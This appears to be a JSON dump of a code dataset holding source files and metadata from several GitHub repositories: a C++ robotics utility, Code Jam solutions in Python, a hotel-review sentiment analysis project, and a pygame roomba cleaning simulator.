${CMAKE_CURRENT_BINARY_DIR}/INSTALLER \"${ROBOTSIO_PYTHON_PIP_METADATA_INSTALLER}\\n\")\n install(\n FILES \"${CMAKE_CURRENT_BINARY_DIR}/METADATA\" \"${CMAKE_CURRENT_BINARY_DIR}/INSTALLER\"\n DESTINATION ${CMAKE_INSTALL_PYTHON3DIR}/robotsio.dist-info)\nendif()\n\n\ninclude(AddUninstallTarget)\n"
},
{
"alpha_fraction": 0.65625,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 15.551724433898926,
"blob_id": "334883efd4fc5f81efcc03a363349e034daad63a",
"content_id": "69ff8746c1f096027a56b6858b32efcc121b2dc1",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 480,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 29,
"path": "/src/RobotsIO/src/Utils/Probe.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/Probe.h>\n\nusing namespace RobotsIO::Utils;\n\n\nProbe::~Probe()\n{}\n\n\nvoid Probe::set_data(const Data& data)\n{\n data_ = data;\n\n /* Signal that new data has been set. */\n on_new_data();\n}\n\n\nData& Probe::get_data()\n{\n return data_;\n}\n"
}
] | 109 |
poojappd/Google | https://github.com/poojappd/Google | 718eea7b03018296cecbfc6f4ae86e5bd655e4b8 | 06e9ddf8e26a2685f9cac5dba0031c1e7a9dae84 | f55320149fa062b0dd94cc9081506236845f1823 | refs/heads/main | 2023-08-30T07:00:48.960221 | 2021-10-18T05:10:42 | 2021-10-18T05:10:42 | 351,399,926 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4422788619995117,
"alphanum_fraction": 0.4542728662490845,
"avg_line_length": 25.479999542236328,
"blob_id": "dbec175cd5f672d11624f3c7581dfef005adfdcf",
"content_id": "8112d906e778af3831b7bd42fb70cdb870c80fc2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 667,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 25,
"path": "/Code Jam/Vestigium.py",
"repo_name": "poojappd/Google",
"src_encoding": "UTF-8",
"text": "t=int(input())\ncase=1\nwhile t>0:\n a=[]\n n=int(input())\n r=0\n c=0\n \n for i in range(n):\n inp=list(map(int,input().split()))\n a.append(inp)\n trace=sum([a[i][i] for i in range(len(a)) ])\n for i in a:\n #print(i,'==',sorted(set(i), key=i.index),'?')\n if i!=sorted(set(i), key=i.index):\n #print(i,\"row is unique\")\n r+=1\n for i in [[i[j] for i in a]for j in range(n)]:\n #print(i,'==',sorted(set(i), key=i.index),'?')\n if i!=sorted(set(i), key=i.index):\n #print(i,\"column is unique\")\n c+=1\n print(f'Case #{case}:',trace,r,c)\n case+=1 \n t-=1\n \n"
},
{
"alpha_fraction": 0.37228259444236755,
"alphanum_fraction": 0.4021739065647125,
"avg_line_length": 17.399999618530273,
"blob_id": "fa5255d1c927b902a44d370b16bd21bed653a251",
"content_id": "6ad1c05eb37669e0d9aafc20f059fcf871a65126",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 368,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 20,
"path": "/Code Jam/Reversesort.py",
"repo_name": "poojappd/Google",
"src_encoding": "UTF-8",
"text": "t=int(input())\ncase=1\nwhile(t>0):\n n=int(input())\n a=list(map(int,input().split()))\n ta=sorted(a.copy())\n mi=0\n #print(ta)\n c=0\n for i in range(n-1):\n ta=(a[i:])\n \n j=a.index(min(ta))\n a[i:j+1]=(a[i:j+1][::-1])\n #a[i],a[j]=a[j],a[i]\n c+=j-i+1\n \n print(f'Case #{case}: {c}')\n case+=1\n t-=1\n"
}
] | 2 |
ashiish23/UIUC_CS410_TextInfoSystems | https://github.com/ashiish23/UIUC_CS410_TextInfoSystems | 16da8169756c00edb581dafc0a025b949bc55fb8 | f7427b613e3500f28f046217aadf1a24885dafc7 | 423b9d49166a4abb08e83417115207aea81a4730 | refs/heads/master | 2021-10-10T17:47:39.208216 | 2019-01-15T03:10:05 | 2019-01-15T03:10:05 | 260,787,135 | 1 | 0 | null | 2020-05-02T22:34:03 | 2020-05-02T22:33:19 | 2019-01-15T03:12:02 | null | [
{
"alpha_fraction": 0.6812983155250549,
"alphanum_fraction": 0.7038639783859253,
"avg_line_length": 42.106666564941406,
"blob_id": "b74a81b272a1ea79063725943a522b8f2fea48fb",
"content_id": "8e68ba36cc021b226ec9448b65d789f09eefc4a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3235,
"license_type": "no_license",
"max_line_length": 251,
"num_lines": 75,
"path": "/Project/code/Hotel_Review_Analysis-master/README.md",
"repo_name": "ashiish23/UIUC_CS410_TextInfoSystems",
"src_encoding": "UTF-8",
"text": "# Sentiment Analysis on 515K Hotel Reviews\n\nTeam member:\n- Xin Qu [email protected], responsible for data processing (stemming, tokenization, removing stop words), classifier evaluations,\nsentiment analysis. \n- Biruo Zhao [email protected], responsible for paper presentation and degbug. \n\n## About the data\n\nThe original dataset is available [515K-hotel-reviews](https://www.kaggle.com/jiashenliu/515k-hotel-reviews-data-in-europe),\nalso available [Hotel_Reviews.csv](https://drive.google.com/file/d/1U2ktXTsFn0GRaan1_LpyYGIH-9EYS-4c/view?usp=sharing). \n\n## Prerequistes\n\n1. At least **python 2.6**. **Jupyter** notebook is uesd for this project. Information about [Jupyter notebook](https://jupyter.org/). \n\n2. Install useful library:\n\n 2.1 **sklearn**\n \n <pip install -U scikit-learn>\n \n 2.2 **nltk**\n \n < pip install -U nltk>\n \n 2.3 **pandas** and **numpy**\n \n <pip install pandas>\n \n <pip install numpy>\n \n 2.4 **folium** for geographical display\n \n <conda install -c conda-forge folium >\n \n 2.5 **matplotlib** for data visualization\n \n <python -m pip install -U matplotlib>\n \n## How to run\n\n1. Download files. \n\n 1.1 Download the original dataset [Hotel_Reviews.csv](https://drive.google.com/file/d/1U2ktXTsFn0GRaan1_LpyYGIH-9EYS-4c/view?usp=sharing) to a local folder. \n \n 1.2 Download \"stop_words.txt\" in the same folder.\n \n (1.3 and 1.4 are **Optional**-these two optional large files > 100MB are generated in \"data_process.ipynb\")\n \n 1.3 Download \"Filling_nans\" pickle file from [Filling_nans](https://drive.google.com/file/d/1w-Mkkqi0js0v_f0JnPI1mWQByadL75xN/view?usp=sharing) in the same folder. \n \n 1.4 Download \"text_df\" pickle file from [text_df](https://drive.google.com/file/d/1UkbWJI5VYrLBxkclNnUuBSDMNZemIswC/view?usp=sharing) in the same folder.\n \n2. Download the 5 **.ipynb** files and save them in the same folder as all the data files stay in step 1. \n\n3. Run **.ipynb** file as the follwong order: run **\"data_process.ipynb\"** first, then **\"aspect_analysis_data_prcocess.ipynb\"**, \nthirdly **\"aspect_analysis.ipynb\"**, the last **\"reviewer_score.ipynb\"**. Open each .ipynb in Jupyter notebook, click run all \ncells. It may take **long** time (several hours) to run \"data_process.ipynb\". \n\n**Additional information**: if skip running \"data_process.ipynb\", must download **\"Filling_nans\"** in **step 1.3**. \n\n## Test case presentation\n\nSince it takes long time (several hours) to run all the four mentioned .ipynb files, **test_case.ipynb** provides the three applications discussed in project report (available under **/paper presentation/Project Report.pdf** with less time consuming. \n\n1. Download **\"text_df\"** pickle file (the same file in How to run-step 1.4) from [text_df](https://drive.google.com/file/d/1UkbWJI5VYrLBxkclNnUuBSDMNZemIswC/view?usp=sharing) in the same folder as \"test_case.ipynb\" stays in. \n\n2. Download the whole **data** folder in the same folder. \n\n3. Open **test_case.ipynb**, click run all. \n\n## Paper work\n\nAll paper work could be found under **/paper presentation**, including project proposal, technology review proposal and project report. See **project report** for details. \n\n"
},
{
"alpha_fraction": 0.7163461446762085,
"alphanum_fraction": 0.7427884340286255,
"avg_line_length": 14.407407760620117,
"blob_id": "027e19db9c7361ee10633e0b08c9a0dd10e9b773",
"content_id": "a3adde72234e90975a349db7a530c573895003de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 416,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 27,
"path": "/Project/Other Projects/Notes.txt",
"repo_name": "ashiish23/UIUC_CS410_TextInfoSystems",
"src_encoding": "UTF-8",
"text": "#20 comment out\n\ntwo classifcation \nsklearn \n\nTN FP\nFN TP \nbinary \npositive 1 negative 0\nfind nb is the best compared accuracy score\n\n------------\nbased on this only check NB\n\ncan do word-based sentiment analysis\nnltk \npostive \n10000 words\nno need to run\nonly show accuracy score\n\n??\nasscoate words to 0 or 1\nif have both neg and pos words ?\naverage score play a what role here?\n\nfreq_pos most common words=> aspect\n"
},
{
"alpha_fraction": 0.5835459232330322,
"alphanum_fraction": 0.6670918464660645,
"avg_line_length": 42.55555725097656,
"blob_id": "b215645a775e112e9e92dc2e6758fa311088e33d",
"content_id": "420d4c5e87940495e870fbf8c7119f878f331ca7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3136,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 72,
"path": "/Project/code/data_process.py",
"repo_name": "ashiish23/UIUC_CS410_TextInfoSystems",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np \n#import\ndf = pd.read_csv(\"Hotel_Reviews.csv\")\n#print(df.shape) ##(515738, 17)\nprint(\"Total number of observations:\", df.shape[0], \"Number of observed features:\", df.shape[1])\nprint(df.columns) ###list of observed features\n##Index([u'Hotel_Address', u'Additional_Number_of_Scoring', u'Review_Date',\n #u'Average_Score', u'Hotel_Name', u'Reviewer_Nationality',\n #u'Negative_Review', u'Review_Total_Negative_Word_Counts',\n #u'Total_Number_of_Reviews', u'Positive_Review',\n #u'Review_Total_Positive_Word_Counts',\n #u'Total_Number_of_Reviews_Reviewer_Has_Given', u'Reviewer_Score',\n #u'Tags', u'days_since_review', u'lat', u'lng'],\n #dtype='object')\nprint(df.head())\nprint(sum(df.duplicated()))\ndf = df.drop_duplicates()\nprint(df.shape)\nprint(\"After removing duplicated data, the total number of observations is:\", df.shape[0], \n \"the total number of features is:\", df.shape[1])\n##process missing values\nprint(df.isnull().any().any())\nnans = lambda df: df[df.isnull().any(axis = 1)]\nnans_df = nans(df)[[\"Hotel_Name\", \"lat\", \"lng\"]]\nprint(nans_df.shape)\nprint(\"Total number of missing values:\", nans_df.shape[0])\nprint(nans_df.Hotel_Name.describe())\nprint(nans_df.Hotel_Name.value_counts())\n#latitude information of Hotels\nloc_lat = {'Fleming s Selection Hotel Wien City':48.209270,\n 'Hotel City Central':48.2136,\n 'Hotel Atlanta':48.210033,\n 'Maison Albar Hotel Paris Op ra Diamond':48.875343,\n 'Hotel Daniel Vienna':48.1888,\n 'Hotel Pension Baron am Schottentor':48.216701,\n 'Austria Trend Hotel Schloss Wilhelminenberg Wien':48.2195,\n 'Derag Livinghotel Kaiser Franz Joseph Vienna':48.245998,\n 'NH Collection Barcelona Podium':41.3916,\n 'City Hotel Deutschmeister':48.22088,\n 'Hotel Park Villa':48.233577,\n 'Cordial Theaterhotel Wien':48.209488,\n 'Holiday Inn Paris Montmartre':48.888920,\n 'Roomz Vienna':48.186605,\n 'Mercure Paris Gare Montparnasse':48.840012,\n 'Renaissance Barcelona Hotel':41.392673,\n 'Hotel Advance':41.383308}\n#longitude information of Hotels\nloc_lng ={'Fleming s Selection Hotel Wien City':16.353479,\n 'Hotel City Central':16.3799,\n 'Hotel Atlanta':16.363449,\n 'Maison Albar Hotel Paris Op ra Diamond':2.323358,\n 'Hotel Daniel Vienna':16.3840,\n 'Hotel Pension Baron am Schottentor':16.359819,\n 'Austria Trend Hotel Schloss Wilhelminenberg Wien':16.2856,\n 'Derag Livinghotel Kaiser Franz Joseph Vienna':16.341080,\n 'NH Collection Barcelona Podium':2.1779,\n 'City Hotel Deutschmeister':16.36663,\n 'Hotel Park Villa':16.345682,\n 'Cordial Theaterhotel Wien':16.351585,\n 'Holiday Inn Paris Montmartre':2.333087,\n 'Roomz Vienna':16.420643,\n 'Mercure Paris Gare Montparnasse':2.323595,\n 'Renaissance Barcelona Hotel':2.167494,\n 'Hotel Advance':2.162828}\ndf['lat'] = df['lat'].fillna(df['Hotel_Name'].apply(lambda x: loc_lat.get(x)))\ndf['lng'] = df['lng'].fillna(df['Hotel_Name'].apply(lambda x: loc_lng.get(x)))\n###save filling file\ndf.to_pickle('Filling_nans')\ndf = pd.read_pickle(\"Filling_nans\")\nprint(df.shape)\nprint(df.Hotel_Name.describe())\n"
}
] | 3 |
phyllispeng/AMS691_python | https://github.com/phyllispeng/AMS691_python | 6d052842f50cf0aedb39940d803a75e510729592 | 68155f8edab5cb6234975ef37c2a1f66faf75cb9 | d7e1b667cf2b50c1bc37b450d94ea581c178ba78 | refs/heads/master | 2020-03-20T07:31:52.591079 | 2016-10-30T05:15:19 | 2016-10-30T05:15:19 | 137,284,197 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5631999969482422,
"alphanum_fraction": 0.6240000128746033,
"avg_line_length": 18.5625,
"blob_id": "160f52c29b48c14ad2cc8402c8b57c29dd16d82e",
"content_id": "be26335c1fee795cd743246fe7c74957bd5531ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 625,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 32,
"path": "/mandelbrot.py",
"repo_name": "phyllispeng/AMS691_python",
"src_encoding": "UTF-8",
"text": "#Mandelbrot Set\n#Name: Yuanyuan Peng\n#ID: 108 734 720\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nN_max = 300\nsome_threshold = 50\n\nx = np.linspace(-2, 1, N_max,endpoint=True)\ny = np.linspace(-1.5, 1.5, N_max,endpoint=True)\nxv,yv = np.meshgrid(x,y)\nc = xv+ 1j*yv\nprint('c',c)\nmask = np.zeros_like(c,dtype = np.bool)\n\n\nfor y1 in range(N_max):\n\tfor x1 in range(N_max):\n\t\tz = 0\n\t\tfor j in range(N_max):\n\t\t\t#c = xv[x1]+1j*yv[y1]\n\t\t\tz = z**2 + c[y1,x1]\n\t\tif np.any(np.absolute(z) < some_threshold):\n\t\t\tmask[x1,y1] = j\n\t\t\n\t\t#print(z)\n\nplt.imshow(mask.T, extent = [-2,1,-1.5,1.5])\nplt.gray()\nplt.savefig('mandelbrot.png')\nplt.show()"
},
{
"alpha_fraction": 0.671480119228363,
"alphanum_fraction": 0.7025270462036133,
"avg_line_length": 22.066667556762695,
"blob_id": "4ace8ea73fa57fdd043e2144810f8426ef508e44",
"content_id": "263ee2348598f5593adb142935c0a582289c1945",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1385,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 60,
"path": "/markov_chain.py",
"repo_name": "phyllispeng/AMS691_python",
"src_encoding": "UTF-8",
"text": "#Markov Chain\n#Name: Yuanyuan Peng\n#ID: 108 734 720\nimport numpy as np\n\n\n#normlize function \ndef normalizes(P):\n\trow_num = 0\n\tR = np.zeros_like(P)\n\n\tfor row in P:\n\n\t\tR[row_num] = row/np.sum(row)\n\t\trow_num = row_num + 1\n\t\n\treturn R\n# funtion take a input P p is the matrix\n\ndef transistion(P,time,p):\n\tfor i in range(time):\n\t\tp = (P.transpose()).dot(p)\n\treturn p\n# compare function see if p_50 equals to p_stationary\ndef compare(p_time, p_station):\n\tboo = np.allclose(p_time, p_station,0.00001)\n\treturn boo\n\n#construct a random matrix\nP = np.random.rand(5,5)\n\nnormal_P = normalizes(P)\n#starts from a random (normalizes) probabilitty distribution p \np = np.random.rand(5,1)\np_stationary=np.zeros_like(p)\nnormal_pt = normalizes(p.transpose())\nnormal_p = normal_pt.transpose()\n \n#and takes 50 steps to obtain p_50\np_50 = transistion(normal_P,50,normal_p)\n \n#and normalizes each row so that it is a transition matrix\n#w is the eigenvalue\n#v is the normalized eigenvectors\nw,v = np.linalg.eig(normal_P.transpose())\n\np_stationaryt = v[:,(np.abs(w-1)).argmin()]\n \n#normalize p stationary\nnormal_p_stationary = p_stationaryt/np.sum(p_stationaryt)\n\np_stationary[:,0] = normal_p_stationary \nprint('p_50', p_50)\nprint('p_stationary', p_stationary)\nresult = compare(p_50, p_stationary)\n\nif result == True:\n\tprint ('p_50 and p_stationary are equal')\nelse:\n\tprint('p_50 and p_stationary are not equal')\n "
}
] | 2 |
shacharr/roomba_sim | https://github.com/shacharr/roomba_sim | ebc3bad8986695b5bb9c7d4bfcef14518e3bb779 | 6e4951b10f8f01ec01a36897614aa8904067650a | 26f2762ef05ad3369e9dd3c82d52aee5044c927b | refs/heads/master | 2021-01-01T16:13:59.431385 | 2015-03-28T18:34:07 | 2015-03-28T18:34:07 | 32,647,843 | 1 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.7781769037246704,
"alphanum_fraction": 0.779524028301239,
"avg_line_length": 52.0476188659668,
"blob_id": "29dadd9da603222242612208a719a7ffc615a0a8",
"content_id": "f90bdf806f21124838c45a1d6336e490994d5d04",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2227,
"license_type": "no_license",
"max_line_length": 339,
"num_lines": 42,
"path": "/Readme.md",
"repo_name": "shacharr/roomba_sim",
"src_encoding": "UTF-8",
"text": "Roomba Simulator\n----------------\n\nThis is a small pygame based roomba simulator.\n\nTo run, \"python controller.py\".\n\nYou will need to have matplotlib and pygame (1.8) installed.\n\nIt assumes a roomba with 2 modes - random direction switching upon hitting a wall or wall following\n\nThe roomba is placed in a polygon shaped room, and let loose.\n\nA nice animation shows what the roomba managed to clean (blue) and what is still dirty (green). The roomba itself is drawn as a red circle, with an arrow showing where it is heading.\n\nCurrently, there is no support for obstacles in the room.\n\nCode is arranged in a classical MVC form.\n\nThe arena_model module contains the Room modeling class. The room keeps a pygame surface indicating what area was cleaned already, as well as a polygon of the room to indicate where the walls are. Similar polygons are used to indicate where there are obstacles in the room. It also keeps count of the clean vs. dirty pixels for statistics.\n\nThe roomba is modeled in roomba_model, based upon a generic cleaning robot model kept in the cleaning_robot_model module. Cleaning robot has location, direction and parameters. The roomba class adds navigation logic state and the navigation logic to the robot.\n\nThe arena_view module contains the major pygame interaction - drawing the roomba and the room, cleaning the screen, etc.\n\nThe controller module is tying the view with the model. It is running the main game loop. It is also collects statistics as for the progress of the cleaning effort over time. Once the room is mostly clean, and no new progress is achieved for a while, the simulation will end and a graph of cleanliness over time will be shown.\n\nTODO:\n-----\n\n- Support for configuration which is not hard coded in the code\n\n * Specifically, specifying the room size and shape, obstacles and roomba size will be nice.\n * Exposing the roomba logic parameters to allow easier tuning might be nice as well.\n\n- Nicer graphics\n\n- Smarter mode switching logic? Especially for cleaning around obstacles.\n\n- Auto tuning of parameters (i.e. when to switch to what mode of cleaning) depending on room size?\n\n- Neato (Lidar scan, mapping, plan a route for cleaning) model for comparison of performance?"
},
{
"alpha_fraction": 0.5569091439247131,
"alphanum_fraction": 0.5711799263954163,
"avg_line_length": 36.31168746948242,
"blob_id": "3fb29c423efbba3fd7d2fcf7fb6fb65a670d75c8",
"content_id": "1c2a316ae90b6c88c2599548bbaff2e105f3da5e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2873,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 77,
"path": "/arena_model.py",
"repo_name": "shacharr/roomba_sim",
"src_encoding": "UTF-8",
"text": "import pygame\n\nfrom helper_functions import *\n\nclass RoomModel(object):\n DIRTY_COLOR = (0,255,0)\n CLEAN_COLOR = (0,0,255)\n DEAD_ZONE_COLOR = (0,0,0)\n def __init__(self, polygon, obstacles=[]):\n self.polygon = polygon\n self.obstacles = obstacles\n max_x = max([x[0] for x in polygon])\n max_y = max([x[1] for x in polygon])\n self.state = pygame.Surface((max_x,max_y))\n self.state.fill(self.DEAD_ZONE_COLOR)\n pygame.draw.polygon(self.state,self.DIRTY_COLOR,polygon)\n for p in obstacles:\n pygame.draw.polygon(self.state,self.DEAD_ZONE_COLOR,p)\n self.clean_count, self.dirty_count = self.count_clean_dirty(0,0,max_x,max_y)\n\n def clean_box(self, len_x, len_y, direction, mid_point):\n # Start at zero-coords\n coords = [(-len_x/2,-len_y/2),( len_x/2,-len_y/2),\n ( len_x/2, len_y/2),(-len_x/2, len_y/2)]\n\n #Rotate\n coords = rotate_polygon(coords,direction)\n\n #Move\n coords = transpose_polygon(coords,mid_point)\n self.clean_polygon(coords)\n\n def clean_polygon(self, corners):\n bbox = polygon_bbox(corners)\n orig_clean,orig_dirty = self.count_clean_dirty(*bbox)\n pygame.draw.polygon(self.state,self.CLEAN_COLOR,corners)\n new_clean,new_dirty = self.count_clean_dirty(*bbox)\n self.clean_count += (new_clean - orig_clean)\n self.dirty_count += (new_dirty - orig_dirty)\n\n\n def is_coliding(self, loc, size):\n for p in [self.polygon] + self.obstacles:\n if is_circle_coliding_with_poligon(p, loc, size):\n return True\n return False\n\n def count_clean_dirty(self,start_x,start_y,end_x,end_y):\n clean_count = 0\n dirty_count = 0\n start_x = int(max(start_x-1,0))\n max_x = self.state.get_clip().width\n delta_x = int(min(end_x+1,max_x)) - start_x\n start_y = int(max(start_y-1,0))\n max_y = self.state.get_clip().height\n delta_y = int(min(end_y+1,max_y)) - start_y\n if delta_x <= 0 or delta_y <= 0:\n return (0,0)\n rect = pygame.Rect(start_x,start_y, delta_x,delta_y)\n sub_surf = self.state.subsurface(rect)\n ar = pygame.PixelArray(sub_surf)\n for x in range(delta_x):\n for y in range(delta_y):\n if ar[x,y] == self.state.map_rgb(self.DIRTY_COLOR):\n dirty_count += 1\n elif ar[x,y] == self.state.map_rgb(self.CLEAN_COLOR):\n clean_count += 1\n del ar,sub_surf\n return (clean_count,dirty_count)\n\n def is_good_start_point(self, loc, size):\n ar = pygame.PixelArray(self.state)\n if ar[loc[0],loc[1]] == self.state.map_rgb(self.DEAD_ZONE_COLOR):\n return False\n if self.is_coliding(loc, size):\n return False\n return True\n"
},
{
"alpha_fraction": 0.5886185765266418,
"alphanum_fraction": 0.6016507148742676,
"avg_line_length": 36.1129035949707,
"blob_id": "cf3f64834026dff714fd0c9cbc9a37d3a3d43933",
"content_id": "0392d71d5b6a06971ab279c7ce54508a7a64d8eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2302,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 62,
"path": "/roomba_model.py",
"repo_name": "shacharr/roomba_sim",
"src_encoding": "UTF-8",
"text": "import math\nimport random\n\nfrom cleaning_robot_model import CleaningRobotModel\n\nfrom helper_functions import *\n\n\nclass RoombaModel(CleaningRobotModel):\n MODE_TIME_LIMIT = [500,2000]\n TURN_SIZE_ON_WALL_FOLLOW = math.pi/180.\n MAX_TURN_STEPS = 360\n SPIRAL_ANGLE_INIT = math.pi/18.\n SPIRAL_ANGLE_RATIO = 0.995\n def __init__(self, *args, **kwargs):\n super(RoombaModel,self).__init__(*args, **kwargs)\n self.in_random_direction_mode = False\n self.looking_for_wall = False\n self.spiral_mode = True\n self.spiral_angle = self.SPIRAL_ANGLE_INIT\n self.time_in_mode = 0\n if \"MODE_TIME_LIMIT\" in kwargs:\n self.MODE_TIME_LIMIT = kwargs[\"MODE_TIME_LIMIT\"]\n if \"TURN_SIZE_ON_WALL_FOLLOW\" in kwargs:\n self.TURN_SIZE_ON_WALL_FOLLOW = kwargs[\"TURN_SIZE_ON_WALL_FOLLOW\"]\n self.MAX_TURN_STEPS = (2*math.pi)/self.TURN_SIZE_ON_WALL_FOLLOW\n\n def left_hand_tracking(self):\n found_wall = False\n for i in range(self.MAX_TURN_STEPS):\n self.turn(-self.TURN_SIZE_ON_WALL_FOLLOW)\n if self.check_move():\n found_wall = True\n break\n if not found_wall:\n self.looking_for_wall = True\n self.turn(self.TURN_SIZE_ON_WALL_FOLLOW)\n\n\n def spiral_step(self):\n self.turn(self.spiral_angle)\n self.spiral_angle = self.spiral_angle * self.SPIRAL_ANGLE_RATIO\n\n def step(self):\n if not self.in_random_direction_mode and not self.looking_for_wall:\n self.left_hand_tracking()\n if self.spiral_mode:\n self.spiral_step()\n collided = self.move()\n self.time_in_mode += 1\n if collided:\n self.looking_for_wall = False\n self.spiral_mode = False\n if self.in_random_direction_mode:\n self.turn(random.randint(0,360)*math.pi/180.)\n else:\n while self.check_move():\n self.turn(self.TURN_SIZE_ON_WALL_FOLLOW)\n if not self.spiral_mode and self.time_in_mode > self.MODE_TIME_LIMIT[self.in_random_direction_mode]:\n self.in_random_direction_mode = not self.in_random_direction_mode\n self.time_in_mode = 0\n print \"Switched to mode\",self.in_random_direction_mode\n\n"
},
{
"alpha_fraction": 0.6179540753364563,
"alphanum_fraction": 0.6238691806793213,
"avg_line_length": 36.324676513671875,
"blob_id": "d1196ea0dea1b8b422330de186c091ae3a087349",
"content_id": "15d04aa3b7a279ff7a75ee76014bd66cef4339ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2874,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 77,
"path": "/simulator.py",
"repo_name": "shacharr/roomba_sim",
"src_encoding": "UTF-8",
"text": "import time\nimport pygame\nimport math\nimport random\nimport itertools\n\nimport arena_model\nimport arena_view\nimport roomba_model\n\n\ndef run_simulation(robot_params={}, room_params={}, stop_conditions={}, visual_feedback=True, draw_final_result=True):\n stats = []\n\n room_polygon = room_params[\"ROOM_POLYGON\"]\n obstecles = room_params[\"OBSTECLES\"]\n\n max_x = max(x[0] for x in room_polygon)\n max_y = max(x[1] for x in room_polygon)\n\n robot_size = robot_params[\"ROBOT_SIZE\"]\n\n if visual_feedback:\n view = arena_view.ScreenView(robot_size, [max_x,max_y])\n room_model = arena_model.RoomModel(room_polygon,obstecles)\n\n if \"INITIAL_POS\" in robot_params:\n start_x,start_y,direction = robot_params[\"INITIAL_POS\"]\n else:\n start_x,start_y=random.randint(0,max_x),random.randint(0,max_y)\n while not room_model.is_good_start_point((start_x,start_y),robot_size):\n start_x,start_y=random.randint(0,max_x),random.randint(0,max_y)\n direction = random.randint(0,360)*math.pi/180.\n roomba = roomba_model.RoombaModel((start_x,start_y), robot_size, robot_params[\"HEAD_SIZE\"],\n direction, robot_params[\"SPEED\"], room_model)\n\n done = False\n last_coverage = 0\n steps_with_no_improvement = 0\n min_coverage = None\n if \"MIN_COVERAGE_TO_EXIT\" in stop_conditions:\n min_coverage = stop_conditions[\"MIN_COVERAGE_TO_EXIT\"]\n max_no_gain_steps = 0\n if \"MAX_NO_GAIN_STEPS\" in stop_conditions:\n max_no_gain_steps = stop_conditions[\"MAX_NO_GAIN_STEPS\"]\n max_time = None\n if \"MAX_TIME\" in stop_conditions:\n max_time = stop_conditions[\"MAX_TIME\"]\n for t in itertools.count():\n coverage = float(room_model.clean_count)/(room_model.clean_count + room_model.dirty_count)\n stats.append(coverage)\n if coverage == last_coverage and min_coverage != None and coverage > min_coverage:\n steps_with_no_improvement += 1\n if steps_with_no_improvement > max_no_gain_steps:\n done = True\n last_coverage = coverage\n if max_time != None and t > max_time:\n done = True\n\n if visual_feedback:\n view.clear_screen(room_model.state)\n \n for event in pygame.event.get(): # User did something\n #print \"Got event\",event,\"type:\",event.type\n if event.type == pygame.QUIT: # If user clicked close\n done=True\n if done:\n break\n roomba.step()\n if visual_feedback:\n view.draw_roomba(*roomba.get_draw_info())\n if not visual_feedback and draw_final_result:\n view = arena_view.ScreenView(robot_size, [max_x,max_y])\n view.clear_screen(room_model.state)\n view.draw_roomba(*roomba.get_draw_info())\n view.clear_screen(room_model.state)\n return stats\n"
},
{
"alpha_fraction": 0.5865113139152527,
"alphanum_fraction": 0.5974576473236084,
"avg_line_length": 38.887325286865234,
"blob_id": "6466795b2b1b1fef0931c2c44ee6c96271442018",
"content_id": "894743b025cb09d9b30fefcfd23b81f08d7d7571",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2832,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 71,
"path": "/cleaning_robot_model.py",
"repo_name": "shacharr/roomba_sim",
"src_encoding": "UTF-8",
"text": "import math\n\nfrom helper_functions import *\n\n\nclass CleaningRobotModel(object):\n TURN_STEP_FOR_DRAWING = math.pi/18.\n def __init__(self, location, size, cleaning_head_size, direction, speed, room):\n self.loc = location\n self.direction = direction\n self.speed = speed\n self.size = size\n self.room = room\n self.cleaning_head_size = cleaning_head_size\n self.trace = [location]\n\n def calc_move_next_loc(self):\n x,y = self.loc\n step_x = -self.speed * math.sin(self.direction)\n step_y = self.speed * math.cos(self.direction)\n return (x+step_x, y+step_y)\n\n def check_move(self):\n new_loc = self.calc_move_next_loc()\n return self.room.is_coliding(new_loc,self.size)\n\n def move(self):\n new_loc = self.calc_move_next_loc()\n # Assumes speed is slow enough to prevent quantom tunneling of the roomba...\n if not self.room.is_coliding(new_loc,self.size):\n mid_point = [(x+y)/2. for x,y in zip(new_loc,self.loc)]\n self.room.clean_box(self.size*1.9, self.speed,\n self.direction, mid_point)\n self.loc = new_loc\n self.trace.append(new_loc)\n return False\n return True\n\n def clean_step(self,initial_step,step_size):\n delta_x = self.size * self.cleaning_head_size / 2.\n cleaned_triangle_1 = [(0,0), (delta_x,0), rotate((delta_x,0), step_size)]\n cleaned_triangle_2 = [(0,0), (-delta_x,0), rotate((-delta_x,0), step_size)]\n\n cleaned_triangle_1 = 